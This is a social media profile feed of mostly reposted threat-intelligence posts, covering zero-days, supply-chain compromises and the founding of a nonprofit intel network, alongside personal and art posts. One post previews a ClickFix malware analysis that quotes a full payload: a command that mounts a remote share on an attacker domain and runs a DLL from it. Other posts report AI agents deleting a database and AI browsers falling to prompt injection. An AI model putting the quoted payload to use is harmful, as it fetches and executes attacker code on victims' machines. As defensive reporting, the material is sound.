Sign in

Aleks Char

@alekschar.bsky.social
56 followers 147 following 29 posts

I am a machines person. aspe:keyoxide.org:CS6WAQPCDKIX45CZGOFZYQKRWM

PostsRepliesMedia
Reposted by Aleks Char
IFIN @ifin-intel.org · 29/09/2026
If you're involved in vulnerability management/VulnOps, the last several months have been overwhelming. But take heart: there is a path forward, despite the madness surrounding us.
ifin-intel.org
Finding the Signal in the Vulnerability Noise | IFIN
The flood of new CVEs can make it hard to know what matters. But there are tools to help find our way.
086
Reposted by Aleks Char
IFIN @ifin-intel.org · 29/09/2026
We've been continuously updating this post with the latest information—now including details on exploitation of CVE-2026-88772. And all relevant indicators have been added to our MISP feed. ifin.network/t/multi... #ThreatIntel #ThreatIntelligence #IFIN
ifin.network
Multiple Citrix Netscaler 0-Days Exploited
Last Updated: 2026-09-29T14:53:55Z (UTC) What’s Happening Citrix has disclosed 8 critical CVEs. https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX697096 There’s also an associated blog post. Affected Versions Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1 BEFORE 14.1-73.37 Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1 BEFORE 13.1-64.23 Citrix NetScaler ADC FIPS BEFORE 14.1-73.37 FIPS Citrix NetScaler ADC FIPS and NDcPP BEFORE 13.1-37.279 Indicato...
285
Reposted by Aleks Char
Taggart @taggart-tech.com · 23/09/2026
You know, if tech companies are looking for a, uh, less *problematic* non-profit to fund, I have some thoughts...
ifin-intel.org
IFIN | The Independent Federated Intelligence Network
A not-for-profit organization dedicated to the teaching of best practices in cyber threat intelligence, and the mutual sharing of timely, actionable, and relevant intelligence among the community.
0104
Aleks Char @alekschar.bsky.social · 11/08/2026
I'm so honored to be a part of @ifin-intel.org. I'm happy to announce that IFIN has achieved tax-exempt status under section 501(c)(3) of the US Tax Code. Put simply, we're a nonprofit! Read more here: ifin-intel.org/blog/nonprof...
ifin-intel.org
It's Official: We're a Recognized Non-Profit | IFIN
IFIN has achieved 501(c)(3) status. What this means for us, and for you.
041
Reposted by Aleks Char
IFIN @ifin-intel.org · 04/08/2026
We're thrilled to announce IFIN has achieved 501(c)(3) recognition! Now we can get down to business. ifin-intel.org/blog/... #IFIN
ifin-intel.org
It's Official: We're a Recognized Non-Profit | IFIN
IFIN has achieved 501(c)(3) status. What this means for us, and for you.
0129
Reposted by Aleks Char
Taggart @taggart-tech.com · 03/08/2026
While this should be read as an institutional failure on behalf of the US government for failing to protect critical infrastructure, hats off to the DEF CON Franklin volunteers. This is the exact spirit in which IFIN was founded.
cybersecuritydive.com
How volunteer cyber experts are helping protect rural water systems
A first-in-the-nation program is seeing promising results as it charts a path for supporting the U.S.’s most vulnerable infrastructure.
2103
Reposted by Aleks Char
IFIN @ifin-intel.org · 31/07/2026
Sorry to disappoint, but there will be no IFIN Threat Actor Taxonomy. Here's why:
ifin-intel.org
Why We Won't Release a Threat Actor Taxonomy | IFIN
Every intel vendor has their naming scheme. We won't play a pointless game.
172
Reposted by Aleks Char
Taggart @taggart-tech.com · 14/07/2026
Found a new ClickFix sample with some old tricks mixed into a new (to me) attack pattern.
discourse.ifin.network
New (to me) ClickFix Pattern
Last Updated: 2026-07-13T21:27:45Z (UTC) What’s Happening I’ve encountered a new (to me) ClickFix pattern utilizing some very old LOLBAS tricks. I’ve seen these before, but never quite in this combination. Here’s a sample payload: pcalua.exe -a "powershell.exe" -c "saps cmd '/v/c set a=pu&set b=shd&set c=run&set d=dll32&for %x in (!a!!b!) do @%x \\prkheekt.site-shartbandi-farsi[.]com@SSL\039a0a6a-6374-4952-9081-d891daefec4d & !c!!d! gc.key,#1' -WI MIn" There’s a lot going on here. First, th...
053
Reposted by Aleks Char
IFIN @ifin-intel.org · 07/06/2026
We just added a ton of feeds to the IFIN news feed aggregator! If you want to keep your view/ingest clean, make sure you're pulling by publication date. Here's the full URL with correct parameters: news.ifin.network/i/...
032
Reposted by Aleks Char
IFIN @ifin-intel.org · 23/05/2026
Add Laravel to the list of large projects whose GitHub repos have been compromised. discourse.ifin.netwo... #ThreatIntel #ThreatIntelligence #IFIN
discourse.ifin.network
Laravel Packages Compromised in Yet Another GitHub Attack
Last Updated: 2026-05-23T05:43:35Z (UTC) What’s Happening Laravel, a popular PHP framework, has had its GitHub packages compromised by a credential stealer. Aikido has a report, and has reported the issue to the maintainers. So has Step Security. Actions Review traffic for DNS/URL indicators of compromise Review endpoint activity for malicious file writes Got Laravel dependencies? Rotate those secrets Follow Recovery steps recommended by Step Indicators of Compromise Value Type ...
096
Reposted by Aleks Char
IFIN @ifin-intel.org · 03/05/2026
313 Team, the Iraqi-aligned group claiming credit for the Ubuntu attack, are now encouraging the use of #CopyFail against Ubuntu targets while servers may not be able to reach updates.
discourse.ifin.network
Ubuntu services under attack
Last Updated: 2026-05-03T04:54:00Z (UTC) Status page is back, showing ppa.launchpad.net being in “custom maintenance,” but nothing else. Pages appear to be accessible. https://status.canonical.com Canonical now has an official forum thread for this incident: Impacted: security.ubuntu.com jaas.ai archive.ubuntu.com canonical.com maas.io blog.ubuntu.com developer.ubuntu.com Ubuntu Security API-CVEs Ubuntu Security API-Notices academy.canonical.com ubuntu.com portal.canonical.com assets....
011
Reposted by Aleks Char
IFIN @ifin-intel.org · 29/04/2026
What is going on today?? We're also tracking #CopyFail. discourse.ifin.netwo... #ThreatIntel #ThreatIntelligence #IFIN
discourse.ifin.network
Copy Fail: 732 Bytes to Root on Every Major Linux Distributions
CVE-2026-31431 Confirmed the exploit. It’s real.
011
Reposted by Aleks Char
Peter Anderson @zerogeewhiz.bsky.social · 27/04/2026
This story is absolutely ridiculous. Claude didn’t just delete everything, it was operating in an environment of entitlements it was granted by the yutzes who put it in charge. You deserve everything you get for taking the human out of the loop www.tomshardware.com/tech-industr...
tomshardware.com
Claude-powered AI coding agent deletes entire company database in 9 seconds — backups zapped, after Cursor tool powered by Anthropic's Claude goes rogue
PocketOS founder blames ‘Cursor running Anthropic's flagship Claude Opus 4.6’ plus Railway’s infrastructure for data disaster.
98627
Reposted by Aleks Char
IFIN @ifin-intel.org · 21/04/2026
Thanks to some excellent reporting from Infostealers by Hudson Rock, we know a context[.]ai employee was seeking Roblox cheats when they got hit with LummaStealer, leading to the initial breach which impacted Vercel. discourse.ifin.network/t/vercel-con...
discourse.ifin.network
Vercel confirms breach as hackers claim to be selling stolen data
Excellent reporting here from Hudson Rock. Logs indicate the user was actively searching for and downloading game exploits, specifically Roblox “auto-farm” scripts and executors. These types of mali...
032
Reposted by Aleks Char
IFIN @ifin-intel.org · 20/04/2026
Today we're talking about another (???) issue in the Cursor AI IDE. Well actually it's two issues, one of which is simple command injection; the other is takeover via Dev tunnels. Don't know what dev tunnels are? Come find out—then block them with extreme prejudice.
163
Reposted by Aleks Char
IFIN @ifin-intel.org · 10/04/2026
CPUID downloads were temporarily compromised earlier today. We have a thread compiling analysis and IoCs for you to investigate: discourse.ifin.netwo... #ThreatIntel #IFIN #ThreatIntelligence
discourse.ifin.network
HWMonitor Download Compromised
Observable: CPUID Downloads with Malware Observable Type: Supply Chain compromise (?) Details: Users reporting getting a malware executable while downloading HWMonitor software from the official CPUID website A discussion on Reddit from an everyday user, with some analysis in the comments: Reddit - Please wait for verification Some press coverage: https://cybernews.com/security/cpuid-hwmonitor-hwinfo-cpuz-deliver-malware/
033
Reposted by Aleks Char
IFIN @ifin-intel.org · 07/04/2026
And our first contribution: here is our thread on currently tracked #Iran-based cyber threat activity, including motivations and targeting information. discourse.ifin.network/t/iran-confl...
discourse.ifin.network
Iran Conflict: Cyber Threat Activity
Reporting indicating collaboration between Russian state-sponsored groups and Iran. The Ukrainian assessment said Russian and Iranian hacker groups were interacting via Telegram and noted collaborat...
0102
Aleks Char @alekschar.bsky.social · 07/04/2026
I can finally share these awesome news. IFIN is here to help orgs to build and strenghten their #cti and exchange knowledge. Come and join the community! I'm so proud to be a part of the team which made it happen.
030
Aleks Char @alekschar.bsky.social · 11/03/2026
Good. I hope people will sue these thiefs out of existence.
000
Reposted by Aleks Char
Molly White @molly.wiki · 21/02/2026
there's a discworld humble bundle to get 35 of the books with a $16 minimum contribution
1824090
Reposted by Aleks Char
Molly Coleman @mollycoleman.bsky.social · 23/01/2026
A number of people from out-of-state have been opening tabs at small businesses—coffee shops where people on patrol can grab a drink and warm up, bars where people can be in community, etc. It’s been a deeply appreciated form of solidarity and helps the businesses closing tomorrow.
101833552
Reposted by Aleks Char
Lesley Carhart @hacks4pancakes.com · 05/01/2026
First blog of the year is five general tips for learning about #OTCybersecurity as a student tisiphone.net/2026/01/04/my-t...
tisiphone.net
My Top 5 Recommendations on OT Cybersecurity Student Upskilling
I get asked about where to start learning OT cybersecurity as a student a lot. I fully realize that attention spans are short and people are busy, so without further ado let’s get to my top f…
610830
Reposted by Aleks Char
Taggart @taggart-tech.com · 17/12/2025
It's done. I can't believe it's finally done. I've been working on this in mostly secret for so long, and I'm so excited to share it with y'all!
taggart-tech.com
Introducing Ringspace: A Proposal for the Human Web
For months, I've been working on a project to demonstrate how we can preserve humanity on the web. It's finally ready for testing.
43521
Reposted by Aleks Char
Dragons of Wales @dragonsofwales.bsky.social · 18/10/2024
Hello new followers. I’m Andy - an illustrator of dragons, dinosaurs and other extinct animals. I work in both traditional and digital media, and am a passionate advocate for human-made art. You can find all my work, purchase my books and contact me here: www.andyfrazer.com
A digital illustration of a tiny red and green dragon perched on a leaf. A digital illustration of a large, brown tyrannosaurus, sat on a muddy shoreline, gazing across a lake with tall trees around its shore. A pencil sketch of two large dinosaurs, affectionately nuzzling. A digital illustration of a herd of woolly mammoths walking into a fierce blizzard in a white-out.
291133217
Reposted by Aleks Char
Jeff Miracola @handle.invalid · 08/10/2025
“Macaw Owl” painted for Upper Deck’s Rush of Ikorr card game. Digital (ProCreate) AD: Andrew Ballesteros
0334
Reposted by Aleks Char
Jason Scott @textfiles.com · 07/10/2025
Okay, it's time. I have a prized Cult of the dead cow Zippo lighter. These simply do not exist anywhere. But a CDC member is hurting and I want to encourage donations to the GoFundMe, so out it goes. Details in thread.
218166
Reposted by Aleks Char
Jeff Miracola @handle.invalid · 03/10/2025
My full art for the borderless version of “Emptiness” from Magic The Gathering’s upcoming Lorwyn Eclipsed set. Oils on Arches oil paper. AD: Deborah Garcia I’ll be auctioning the original oil painting the week of October 6th.
519944
Reposted by Aleks Char
Electronic Frontier Foundation @eff.org · 01/10/2025
Tired of doomscrolling? Trade chaos for creativity. The new @nostarchpress.bsky.social tech bundle has 21 books on electronics, consoles, and more. Pay what you want—$36 gets them all and supports EFF. www.humblebundle.com/books/elect...
humblebundle.com
Humble Tech Book Bundle: Electronics for the Curious by No Starch
Pay what you want to deepen your knowledge of video games and technology with our latest Tech Book Bundle: Electronics for the Curious.
04814
Aleks Char @alekschar.bsky.social · 01/10/2025
The art for Lorwyn Eclipsed is absolutely sick. I'm reading a magic.wizards.com/en/news/magi... and I want them all as my wallpaper. I'm so excited for this set!
magic.wizards.com
000
Reposted by Aleks Char
Electronic Frontier Foundation @eff.org · 15/09/2025
A bundle of electronics books in this economy?? Yep! No Starch Press is offering $581 worth of titles for as little as $36 (and you can support EFF, too!).
humblebundle.com
Humble Tech Book Bundle: Electronics for the Curious by No Starch
Pay what you want to deepen your knowledge of video games and technology with our latest Tech Book Bundle: Electronics for the Curious.
16518
Aleks Char @alekschar.bsky.social · 09/09/2025
I thought it'a frog computer mouse, lol. I agree. We need more frog phones!
010
Aleks Char @alekschar.bsky.social · 09/09/2025
I recommend not only this one, but all of Julia's zines. Some come with stickers!
020
Reposted by Aleks Char
Meredith Whittaker @meredithmeredith.bsky.social · 08/09/2025
Signal Secure Backups are here 🙌
16573130
Reposted by Aleks Char
Josh Junon @bad-at-computer.bsky.social · 08/09/2025
Yep, I've been pwned. 2FA reset email, looked very legitimate. Only NPM affected. I've sent an email off to @npmjs.bsky.social to see if I can get access again. Sorry everyone, I should have paid more attention. Not like me; have had a stressful week. Will work to get this cleaned up.
1518658
Reposted by Aleks Char
Lisa Song @lisalsong.bsky.social · 03/09/2025
Holy shit: Stateline spoke to nearly a dozen firefighters, agency staffers and contractors, who said that top officials assigned to the fire deployed the crews to a remote location under false pretenses so federal agents could check their immigration status. www.hcn.org/articles/fir...
hcn.org
Firefighters question leaders’ role in ICE raid near Bear Gulch Fire - High Country News
Firefighting veterans believe the management team overseeing fire crews played a key role in handing team members over to immigration authorities.
10735151802
Reposted by Aleks Char
Scary "Grampus" Jerry 👻 @jerry.infosec.exchange.ap.brid.gy · 02/09/2025
FYI - because of what I saw happening over on mastodon. Social and a few other instances, I am resetting all the password of infosec.exchange users that haven't logged in during the previous 3 months. There's a lot of password stuffing and whatnot going on and I don't want to contribute to the […]
infosec.exchange
Original post on infosec.exchange
6552
Reposted by Aleks Char
Taggart @taggart-tech.com · 25/08/2025
The power of automation! AI browsers will do the hard work of clicking on phishing emails for you, and get prompt injected while they're at it.
guard.io
"Scamlexity": When Agentic AI Browsers Get Scammed
We Put Agentic AI Browsers to the Test - They Clicked, They Paid, They Failed
042
Aleks Char @alekschar.bsky.social · 19/08/2025
A good read!
020
Reposted by Aleks Char
David Ho @davidho.bsky.social · 18/08/2025
Welcome to the enshittification of cars. This is the worst thing to happen to cars since SUVs.
bbc.co.uk
VW introduces monthly subscription to increase car power
The German car-maker says its
21665165
Reposted by Aleks Char
Travis R. Eby @travis-robert.bsky.social · 16/08/2025
I will never apologize for being a grouch about the fact that everyone takes calls in public over speakerphone now
3292
Reposted by Aleks Char
2600 - The Hacker Quarterly @2600.com · 12/08/2025
One hour to go for HOPE tickets! store.2600.com/collections/...
store.2600.com
HOPE Tickets
185
Aleks Char @alekschar.bsky.social · 10/08/2025
This is a solid homelab guide. Go, get one. Happy Birthday @taggart-tech.com :)
020
Reposted by Aleks Char
🇺🇸💙💙🤔🤨CJ🤣🧐💙💙🇺🇸 @cnice59.bsky.social · 09/08/2025
I Couldn’t Agree More With This… 👊🏼👊🏾👊🏿💥
391291290
Reposted by Aleks Char
Carolina A. Miranda @cmonstah.bsky.social · 04/08/2025
Found nature’s Labubu. Meet the telescopefish:
5033849
Aleks Char @alekschar.bsky.social · 23/07/2025
Ozzy died, and I'm sad. Goodbye Ozzy.
000
Reposted by Aleks Char
Jun34u @jun34u.bsky.social · 17/07/2025
Unlike CEOs and other executives, individual contributors understand concert OPSEC
A photo of a TV where a woman dressed as a ghost for the Eras Tour is interviewed by local news. The caption reads “Woman hides identity because she called in sick to work.”
101148772580
Reposted by Aleks Char
hrbrmstr 🇺🇦 🇬🇱 🇨🇦 🏳️‍🌈 @hrbrmstr.dev · 12/07/2025
I have no idea why I am pairing this link — www.instructables.com/How-to-Build... — with this link — www.theregister.com/2025/07/11/h... Nope. No idea. None.
instructables.com
How to Build a DIY Signal Jammer for Drones, Wi-Fi, and 4G Networks
How to Build a DIY Signal Jammer for Drones, Wi-Fi, and 4G Networks: In this project, I'll show you how to create a powerful homemade signal jammer capable of interfering with various types of signals...
063
Aleks Char @alekschar.bsky.social · 04/07/2025
I know not everybody can go Graphene, so please look at this. tuta.com/blog/how-to-...
tuta.com
On July 7, Gemini AI will access your WhatsApp and more. Learn how to disable it on Android. | Tuta
Gemini AI needs to be disabled on Android or it will override your privacy settings and gain full access to your texts, calls, and WhatsApp - even if you’ve turned off Gemini Apps Activity. But what d...
000
Aleks Char @alekschar.bsky.social · 02/07/2025
I can't wait. I hope it will be available on many platforms.
000